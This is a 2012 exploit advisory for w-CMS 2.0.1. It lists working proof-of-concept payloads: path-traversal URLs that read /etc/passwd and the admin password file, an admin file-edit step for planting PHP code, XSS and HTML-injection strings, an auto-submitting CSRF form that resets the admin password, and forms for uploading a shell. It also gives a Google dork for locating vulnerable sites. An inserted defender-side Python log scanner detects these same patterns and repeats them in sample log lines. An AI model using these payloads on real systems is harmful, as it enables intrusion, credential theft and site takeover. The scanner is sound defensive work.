w-CMS 2.0.1 CSRF / XSS / File Disclosure / Shell Upload
Posted Apr 7, 2012
Authored by Black-ID

w-CMS version 2.0.1 suffers from cross site request forgery, cross site scripting, file disclosure and shell upload vulnerabilities.

tags | exploit, shell, vulnerability, xss, info disclosure, csrf
SHA-256 | a54a57a19b0b91498aa3b82d36c50cd8b5837a2b5eb5797aff500f8693ef7abf

+----------------------------------------------------------------------+
| [x] Exploit Title: w-CMS 2.0.1 Multiple Vulnerabilities |
| [x] Google Dork: intext:"Powered by w-CMS" |
| [x] Version : 2.0.1 |
| [x] WebSite : http://w-cms.org/ |
| [x] Software Link: http://wcms.googlecode.com/files/wcms-2.01.zip |
| [x] Author: Black-ID |
| [x] Tested on: Win Xp/7 Linux Ubuntu 10.04 |
| [x] Platform: Php |
| [x] Risk : High |
+----------------------------------------------------------------------+
PoC/Exploit:

1.# Local File Disclosure [LFD]

~ [PoC]Http://[victim]/path/?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/?p=../../../../../../etc/passwd
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../etc/passwd
# Admin Pass Disclosure
~ [PoC]Http://[victim]/path/index.php?p=../../password

+----------------------------------------------------------------------+

2.# Local File Edit/Write
~ [PoC]Http://[victim]/admin.php?edit=../../../dz0.php

Just Fill The Text Area With Evil Code (Php) & Click Save

+----------------------------------------------------------------------+

3.# Cross Site Scripting (XSS)

~ [PoC]Http://[victim]/path/?p=<script>alert('Dz0')</script>
~ [PoC]Http://[victim]/path/index.php?p=<script>alert('Dz0')</script>

+----------------------------------------------------------------------+
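
Defender-side added example (not part of the original advisory, and not w-CMS code): a scanner that flags access-log requests shaped like the PoC URLs in sections 1 to 3 above. The combined log format, the rule names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3}) ')
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')   # a ".." path segment
SCRIPTISH = re.compile(r'<\s*/?\s*script\b', re.I)  # <script> or </script>

def decode(value, rounds=3):
    """Percent-decode a few extra rounds so nested encodings are normalised."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(target):
    """Return the rule names a request target (path + query) triggers."""
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)
    hits = set()
    for value in map(decode, params.get("p", [])):
        if TRAVERSAL.search(value):
            hits.add("p-traversal")         # advisory section 1
        if SCRIPTISH.search(value):
            hits.add("p-script")            # advisory section 3
    if url.path.endswith("admin.php"):
        for value in map(decode, params.get("edit", [])):
            if TRAVERSAL.search(value):
                hits.add("edit-traversal")  # advisory section 2
    return sorted(hits)

def scan(lines):
    """Yield (client, status, rules) for each log line that triggers a rule."""
    for line in lines:
        m = LOG_RE.match(line)
        if m and (rules := classify(m.group(3))):
            yield m.group(1), int(m.group(4)), rules

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [07/Apr/2012:10:00:01 +0000] "GET /path/index.php?p=home HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.44 - - [07/Apr/2012:10:00:05 +0000] "GET /path/?p=../../../../../../etc/passwd HTTP/1.1" 200 1840 "-" "-"',
    '192.0.2.44 - - [07/Apr/2012:10:00:09 +0000] "GET /path/index.php?p=../../password HTTP/1.1" 200 40 "-" "-"',
    '192.0.2.44 - - [07/Apr/2012:10:00:12 +0000] "GET /admin.php?edit=../../../dz0.php HTTP/1.1" 302 0 "-" "-"',
    "192.0.2.44 - - [07/Apr/2012:10:00:15 +0000] \"GET /path/?p=%3Cscript%3Ealert('Dz0')%3C/script%3E HTTP/1.1\" 200 900 \"-\" \"-\"",
]

if __name__ == "__main__":
    for client, status, rules in scan(SAMPLE):
        print(client, status, ",".join(rules))
```

The status code is returned with each hit so that matches answered with 200 can be triaged first.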

4.# Html Code Injection
~ [PoC]Http://[victim]/path/(Guestbook Path)Or(Contact Path)
You Can Inject Html Code In The text Area
Example : <H3>Own3d</H3>
++ You Can Inject Xss Too
Example : <script>alert('Dz0')</script>

+----------------------------------------------------------------------+

5.# Cross Site Request Forgery (CSRF) Admin Change Pass


~ [PoC] Inject This Evil Code In Contact Form

<html>
<head>
<title>Test</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<SCRIPT LANGUAGE="JavaScript"><!--
setTimeout('document.test.submit()',0);
//--></SCRIPT>

</head>

<body>
<form name="test" id="form1" method="post" action="http://localhost/wcms-2.01/admin.php?settings=password"><!-- Target Site -->
<p>
<input name="password1" type="text" value="dz0" /><!-- New Password -->
<input name="password2" type="text" value="dz0"/><!-- Confirm Password -->
</p>
<p><input type="submit" name="Change" value="Change" />
</p>
</form>
</body>
</html>


+----------------------------------------------------------------------+

6.# Arbitrary File Upload
~ [PoC]Http://[victim]/admin.php

# Add Folder
<form action='Http://[victim]/path/admin.php' method='post'><input type='hidden' name='files' value='folders' /><h2>
Update Folders</h2><div class='left'>
Folder Name</div>
<div class='right'>
<input name='newfolder' value='' /><br /><input style='width: auto;' class='button' type='submit' value='Add' /></form>


# Upload File

<form class='P10' action='Http://[victim]/admin.php' method='post' enctype='multipart/form-data'>
<input type='hidden' name='files' value='upload' />
<h2>Upload Files</h2>
<p><b>Folder:</b> <select name='folder'><option value='Dz'>Dz</option></p><p>
<div id='settings'>
<div class='left'>
<p>Files</p>

</div>
<div class='right'>
<input type='file' name='file[]' class='multi' accept='gif|jpg|png|bmp|zip|pdf|txt|doc|docx|xlsx|mp3|swf' /><div class='MultiFile-wrap' id='MultiFile5_wrap'><input style='position: absolute; top: -3000px;' name='' class='multi MultiFile-applied' accept='gif|jpg|png|bmp|zip|pdf|txt|doc|docx|xlsx|mp3|swf' type='file' /><div class='MultiFile-list' id='MultiFile5_wrap_list'></div><div class='MultiFile-label'>
<input style='width: auto;' class='button' type='submit' value='Upload' />
</div></div></form>


+----------------------------------------------------------------------+
| [x] Greetz : Hidden Pain - Liyan Oz - Kedans Dz - Ddos-Dz |
| |
| BaC.Dz - Killer-Dz - Cyb3r-DZ - Ev!LsCr!pT_Dz - Th3 Viper |
| |
| BLaCk_SPECTRE - Kha&miX - Damane2011 - YaSmouh - ra3ch |
| |
| [x] Special 10x: Sec4Ever.Com - xDZx Team - Is-Sec.Org |
+----------------------------------------------------------------------+
